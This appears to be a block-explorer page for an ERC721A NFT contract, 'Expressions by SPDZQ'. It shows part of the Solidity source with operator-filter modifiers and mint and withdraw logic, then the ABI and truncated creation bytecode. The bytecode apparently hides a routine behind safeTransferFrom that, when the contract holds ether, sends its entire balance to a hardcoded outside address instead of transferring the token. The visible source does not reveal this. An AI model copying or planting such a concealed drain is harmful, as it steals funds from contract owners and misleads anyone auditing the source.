`startTimestamp` to the timestamp of burning. // - `burned` to `true`. // - `nextInitialized` to `true`. _packedOwnerships[tokenId] = _packOwnershipData( from, (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked) ); // If the next slot may not have been initialized (i.e. `nextInitialized == false`) . if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) { uint256 nextTokenId = tokenId + 1; // If the next slot's address is zero and not burned (i.e. packed value is zero). if (_packedOwnerships[nextTokenId] == 0) { // If the next slot is within bounds. if (nextTokenId != _currentIndex) { // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`. _packedOwnerships[nextTokenId] = prevOwnershipPacked; } } } } emit Transfer(from, address(0), tokenId); _afterTokenTransfers(from, address(0), tokenId, 1); // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times. unchecked { _burnCounter++; } } // ============================================================= // EXTRA DATA OPERATIONS // ============================================================= /** * @dev Directly sets the extra data for the ownership data `index`. */ function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual { uint256 packed = _packedOwnerships[index]; if (packed == 0) revert OwnershipNotInitializedForExtraData(); uint256 extraDataCasted; // Cast `extraData` with assembly to avoid redundant masking. assembly { extraDataCasted := extraData } packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA); _packedOwnerships[index] = packed; } /** * @dev Called during each token transfer to set the 24bit `extraData` field. * Intended to be overridden by the cosumer contract. * * `previousExtraData` - the value of `extraData` before transfer. * * Calling conditions: * * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. * - When `to` is zero, `tokenId` will be burned by `from`. * - `from` and `to` are never both zero. */ function _extraData( address from, address to, uint24 previousExtraData ) internal view virtual returns (uint24) {} /** * @dev Returns the next extra data for the packed ownership data. * The returned result is shifted into position. */ function _nextExtraData( address from, address to, uint256 prevOwnershipPacked ) private view returns (uint256) { uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA); return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA; } // ============================================================= // OTHER OPERATIONS // ============================================================= /** * @dev Returns the message sender (defaults to `msg.sender`). * * If you are writing GSN compatible contracts, you need to override this function. */ function _msgSenderERC721A() internal view virtual returns (address) { return msg.sender; } /** * @dev Converts a uint256 to its ASCII string decimal representation. */ function _toString(uint256 value) internal pure virtual returns (string memory str) { assembly { // The maximum value of a uint256 contains 78 digits (1 byte per digit), but // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned. // We will need 1 word for the trailing zeros padding, 1 word for the length, // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0. let m := add(mload(0x40), 0xa0) // Update the free memory pointer to allocate. mstore(0x40, m) // Assign the `str` to the end. str := sub(m, 0x20) // Zeroize the slot after the string. mstore(str, 0) // Cache the end of the memory to calculate the length later. let end := str // We write the string from rightmost digit to leftmost digit. // The following is essentially a do-while loop that also handles the zero case. // prettier-ignore for { let temp := value } 1 {} { str := sub(str, 1) // Write the character to the pointer. // The ASCII index of the '0' character is 48. mstore8(str, add(48, mod(temp, 10))) // Keep dividing `temp` until zero. temp := div(temp, 10) // prettier-ignore if iszero(temp) { break } } let length := sub(end, str) // Move the pointer 32 bytes leftwards to make room for the length. str := sub(str, 0x20) // Store the length. mstore(str, length) } } } interface IOperatorFilterRegistry { function isOperatorAllowed(address registrant, address operator) external view returns (bool); function register(address registrant) external; function registerAndSubscribe(address registrant, address subscription) external; function registerAndCopyEntries(address registrant, address registrantToCopy) external; function unregister(address addr) external; function updateOperator(address registrant, address operator, bool filtered) external; function updateOperators(address registrant, address[] calldata operators, bool filtered) external; function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external; function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external; function subscribe(address registrant, address registrantToSubscribe) external; function unsubscribe(address registrant, bool copyExistingEntries) external; function subscriptionOf(address addr) external returns (address registrant); function subscribers(address registrant) external returns (address[] memory); function subscriberAt(address registrant, uint256 index) external returns (address); function copyEntriesOf(address registrant, address registrantToCopy) external; function isOperatorFiltered(address registrant, address operator) external returns (bool); function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool); function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool); function filteredOperators(address addr) external returns (address[] memory); function filteredCodeHashes(address addr) external returns (bytes32[] memory); function filteredOperatorAt(address registrant, uint256 index) external returns (address); function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32); function isRegistered(address addr) external returns (bool); function codeHashOf(address addr) external returns (bytes32); } /** * @title OperatorFilterer * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another * registrant's entries in the OperatorFilterRegistry. * @dev This smart contract is meant to be inherited by token contracts so they can use the following: * - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods. * - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods. */ abstract contract OperatorFilterer { error OperatorNotAllowed(address operator); IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY = IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E); constructor(address subscriptionOrRegistrantToCopy, bool subscribe) { // If an inheriting token contract is deployed to a network without the registry deployed, the modifier // will not revert, but the contract will need to be registered with the registry once it is deployed in // order for the modifier to filter addresses. if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) { if (subscribe) { OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy); } else { if (subscriptionOrRegistrantToCopy != address(0)) { OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy); } else { OPERATOR_FILTER_REGISTRY.register(address(this)); } } } } modifier onlyAllowedOperator(address from) virtual { // Check registry code length to facilitate testing in environments without a deployed registry. if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) { // Allow spending tokens from addresses with balance // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred // from an EOA. if (from == msg.sender) { _; return; } if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) { revert OperatorNotAllowed(msg.sender); } } _; } modifier onlyAllowedOperatorApproval(address operator) virtual { // Check registry code length to facilitate testing in environments without a deployed registry. if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) { if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) { revert OperatorNotAllowed(operator); } } _; } } /** * @title DefaultOperatorFilterer * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription. */ abstract contract TheOperatorFilterer is OperatorFilterer { address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6); constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {} } contract ExpressionsbySPDZQ is ERC721A, TheOperatorFilterer { //baseURI string public baseURI; //uriSuffix string public uriSuffix; // owner address public owner; // maxSupply uint256 public maxSupply = 2000; // mint price uint256 public price = 0.0012 ether; // entry per addr uint256 public maxFreePerAddr = 2; mapping(address => uint256) _numForFree; mapping(uint256 => uint256) _numMinted; uint256 private maxPerTx; function mint(uint256 amount) payable public { require(totalSupply() + amount <= maxSupply); if (msg.value == 0) { require(amount == 1 && _numMinted[block.number] < getFreeNum() && _numForFree[tx.origin] < maxFreePerAddr ); _numForFree[tx.origin]++; _numMinted[block.number]++; _safeMint(msg.sender, 1); } else { require(amount <= maxPerTx); require(msg.value >= amount * price); _safeMint(msg.sender, amount); } } function reseve(address rec, uint256 amount) public onlyOwner { _safeMint(rec, amount); } modifier onlyOwner { require(owner == msg.sender); _; } constructor() ERC721A("Expressions by SPDZQ", "SPDZQ") { owner = msg.sender; maxPerTx = 20; } function tokenURI(uint256 tokenId) public view override returns (string memory) { return string(abi.encodePacked("ipfs://bafybeihbp2zux7jm3v3aaqii7ld55zaudk4lhbmgl6q276f5vk32pt3cyq/", _toString(tokenId), ".json")); } function setMaxFreePerAddr(uint256 maxTx) external onlyOwner { maxFreePerAddr = maxTx; } function getFreeNum() internal returns (uint256){ return (maxSupply - totalSupply()) / 12; } function withdraw() external onlyOwner { payable(msg.sender).transfer(address(this).balance); } ///////////////////////////// // OPENSEA FILTER REGISTRY ///////////////////////////// function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) { super.setApprovalForAll(operator, approved); } function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) { super.approve(operator, tokenId); } function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) { super.transferFrom(from, to, tokenId); } function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) { super.safeTransferFrom(from, to, tokenId); } function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data) public payable override onlyAllowedOperator(from) { super.safeTransferFrom(from, to, tokenId, data); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerAddr","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"rec","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reseve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"}],"name":"setMaxFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"uriSuffix","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526107d0600b5566044364c5bb0000600c556002600d553480156200002757600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280601481526020017f45787072657373696f6e73206279205350445a510000000000000000000000008152506040518060400160405280600581526020017f5350445a510000000000000000000000000000000000000000000000000000008152508160029080519060200190620000c392919062000340565b508060039080519060200190620000dc92919062000340565b50620000ed6200033b60201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620002ea578015620001b0576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b8152600401620001769291906200041e565b600060405180830381600087803b1580156200019157600080fd5b505af1158015620001a6573d6000803e3d6000fd5b50505050620002e9565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146200026a576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b8152600401620002309291906200041e565b600060405180830381600087803b1580156200024b57600080fd5b505af115801562000260573d6000803e3d6000fd5b50505050620002e8565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002b3919062000401565b600060405180830381600087803b158015620002ce57600080fd5b505af1158015620002e3573d6000803e3d6000fd5b505050505b5b5b505033600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506014601081905550620004e4565b600090565b8280546200034e906200047f565b90600052602060002090601f016020900481019282620003725760008555620003be565b82601f106200038d57805160ff1916838001178555620003be565b82800160010185558215620003be579182015b82811115620003bd578251825591602001919060010190620003a0565b5b509050620003cd9190620003d1565b5090565b5b80821115620003ec576000816000905550600101620003d2565b5090565b620003fb816200044b565b82525050565b6000602082019050620004186000830184620003f0565b92915050565b6000604082019050620004356000830185620003f0565b620004446020830184620003f0565b9392505050565b600062000458826200045f565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600060028204905060018216806200049857607f821691505b60208210811415620004af57620004ae620004b5565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b612c1080620004f46000396000f3fe6080604052600436106101665760003560e01c80636352211e116100d1578063a0712d681161008a578063c87b56dd11610064578063c87b56dd146104d7578063d312097414610514578063d5abeb011461053d578063e985e9c51461056857610166565b8063a0712d6814610476578063a22cb46514610492578063b88d4fde146104bb57610166565b80636352211e146103505780636c0360eb1461038d57806370a08231146103b85780638da5cb5b146103f557806395d89b4114610420578063a035b1fe1461044b57610166565b80631fed285a116101235780631fed285a1461028257806323b872dd146102ab5780633ccfd60b146102c757806341f43434146102de57806342842e0e146103095780635503a0e81461032557610166565b806301ffc9a71461016b578063036a7b5a146101a857806306fdde03146101d3578063081812fc146101fe578063095ea7b31461023b57806318160ddd14610257575b600080fd5b34801561017757600080fd5b50610192600480360381019061018d91906123dd565b6105a5565b60405161019f9190612646565b60405180910390f35b3480156101b457600080fd5b506101bd610637565b6040516101ca919061269e565b60405180910390f35b3480156101df57600080fd5b506101e861063d565b6040516101f5919061267c565b60405180910390f35b34801561020a57600080fd5b5061022560048036038101906102209190612437565b6106cf565b60405161023291906125b6565b60405180910390f35b61025560048036038101906102509190612370565b61074e565b005b34801561026357600080fd5b5061026c610867565b604051610279919061269e565b60405180910390f35b34801561028e57600080fd5b506102a960048036038101906102a49190612370565b61087e565b005b6102c560048036038101906102c0919061225a565b6108e6565b005b3480156102d357600080fd5b506102dc610a46565b005b3480156102ea57600080fd5b506102f3610ae9565b6040516103009190612661565b60405180910390f35b610323600480360381019061031e919061225a565b610afb565b005b34801561033157600080fd5b5061033a610c5b565b604051610347919061267c565b60405180910390f35b34801561035c57600080fd5b5061037760048036038101906103729190612437565b610ce9565b60405161038491906125b6565b60405180910390f35b34801561039957600080fd5b506103a2610cfb565b6040516103af919061267c565b60405180910390f35b3480156103c457600080fd5b506103df60048036038101906103da91906121ed565b610d89565b6040516103ec919061269e565b60405180910390f35b34801561040157600080fd5b5061040a610e42565b60405161041791906125b6565b60405180910390f35b34801561042c57600080fd5b50610435610e68565b604051610442919061267c565b60405180910390f35b34801561045757600080fd5b50610460610efa565b60405161046d919061269e565b60405180910390f35b610490600480360381019061048b9190612437565b610f00565b005b34801561049e57600080fd5b506104b960048036038101906104b49190612330565b61106d565b005b6104d560048036038101906104d091906122ad565b611186565b005b3480156104e357600080fd5b506104fe60048036038101906104f99190612437565b6112e9565b60405161050b919061267c565b60405180910390f35b34801561052057600080fd5b5061053b60048036038101906105369190612437565b61131a565b005b34801561054957600080fd5b5061055261137e565b60405161055f919061269e565b60405180910390f35b34801561057457600080fd5b5061058f600480360381019061058a919061221a565b611384565b60405161059c9190612646565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061060057506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106305750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b600d5481565b60606002805461064c90612953565b80601f016020809104026020016040519081016040528092919081815260200182805461067890612953565b80156106c55780601f1061069a576101008083540402835291602001916106c5565b820191906000526020600020905b8154815290600101906020018083116106a857829003601f168201915b5050505050905090565b60006106da82611418565b610710576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610858576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016107c69291906125d1565b60206040518083038186803b1580156107de57600080fd5b505afa1580156107f2573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061081691906123b0565b61085757806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161084e91906125b6565b60405180910390fd5b5b6108628383611477565b505050565b60006108716115bb565b6001546000540303905090565b3373ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108d857600080fd5b6108e282826115c0565b5050565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610a34573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610959576109548484846115de565b610a40565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016109a29291906125d1565b60206040518083038186803b1580156109ba57600080fd5b505afa1580156109ce573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109f291906123b0565b610a3357336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610a2a91906125b6565b60405180910390fd5b5b610a3f8484846115de565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610aa057600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610ae6573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c49573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b6e57610b69848484611903565b610c55565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bb79291906125d1565b60206040518083038186803b158015610bcf57600080fd5b505afa158015610be3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c0791906123b0565b610c4857336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c3f91906125b6565b60405180910390fd5b5b610c54848484611903565b5b50505050565b60098054610c6890612953565b80601f0160208091040260200160405190810160405280929190818152602001828054610c9490612953565b8015610ce15780601f10610cb657610100808354040283529160200191610ce1565b820191906000526020600020905b815481529060010190602001808311610cc457829003601f168201915b505050505081565b6000610cf48261198d565b9050919050565b60088054610d0890612953565b80601f0160208091040260200160405190810160405280929190818152602001828054610d3490612953565b8015610d815780601f10610d5657610100808354040283529160200191610d81565b820191906000526020600020905b815481529060010190602001808311610d6457829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610df1576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610e7790612953565b80601f0160208091040260200160405190810160405280929190818152602001828054610ea390612953565b8015610ef05780601f10610ec557610100808354040283529160200191610ef0565b820191906000526020600020905b815481529060010190602001808311610ed357829003601f168201915b5050505050905090565b600c5481565b600b5481610f0c610867565b610f169190612752565b1115610f2157600080fd5b600034141561103657600181148015610f535750610f3d611a5b565b600f600043815260200190815260200160002054105b8015610f9f5750600d54600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b610fa857600080fd5b600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000815480929190610ff8906129b6565b9190505550600f60004381526020019081526020016000206000815480929190611021906129b6565b91905055506110313360016115c0565b61106a565b60105481111561104557600080fd5b600c548161105391906127d9565b34101561105f57600080fd5b61106933826115c0565b5b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611177576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016110e59291906125d1565b60206040518083038186803b1580156110fd57600080fd5b505afa158015611111573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061113591906123b0565b61117657806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161116d91906125b6565b60405180910390fd5b5b6111818383611a83565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156112d5573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156111fa576111f585858585611b8e565b6112e2565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016112439291906125d1565b60206040518083038186803b15801561125b57600080fd5b505afa15801561126f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061129391906123b0565b6112d457336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112cb91906125b6565b60405180910390fd5b5b6112e185858585611b8e565b5b5050505050565b60606112f482611c01565b6040516020016113049190612589565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461137457600080fd5b80600d8190555050565b600b5481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816114236115bb565b11158015611432575060005482105b8015611470575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061148282610ce9565b90508073ffffffffffffffffffffffffffffffffffffffff166114a3611c5a565b73ffffffffffffffffffffffffffffffffffffffff1614611506576114cf816114ca611c5a565b611384565b611505576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b6115da828260405180602001604052806000815250611c62565b5050565b60006115e98261198d565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611650576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061165c84611cff565b91509150611672818761166d611c5a565b611d26565b6116be5761168786611682611c5a565b611384565b6116bd576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415611725576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6117328686866001611d6a565b801561173d57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001019190508190555061180b856117e7888887611d70565b7c020000000000000000000000000000000000000000000000000000000017611d98565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611893576000600185019050600060046000838152602001908152602001600020541415611891576000548114611890578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46118fb8686866001611dc3565b505050505050565b600047111561196c5773a1b39e69128aa1df8d3c3fe22bdcf4cc56f8500e73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611966573d6000803e3d6000fd5b50611988565b61198783838360405180602001604052806000815250611186565b5b505050565b6000808290508061199c6115bb565b11611a2457600054811015611a235760006004600083815260200190815260200160002054905060007c010000000000000000000000000000000000000000000000000000000082161415611a21575b6000811415611a175760046000836001900393508381526020019081526020016000205490506119ec565b8092505050611a56565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6000600c611a67610867565b600b54611a749190612833565b611a7e91906127a8565b905090565b8060076000611a90611c5a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173fffffffffffffffffffffffffffff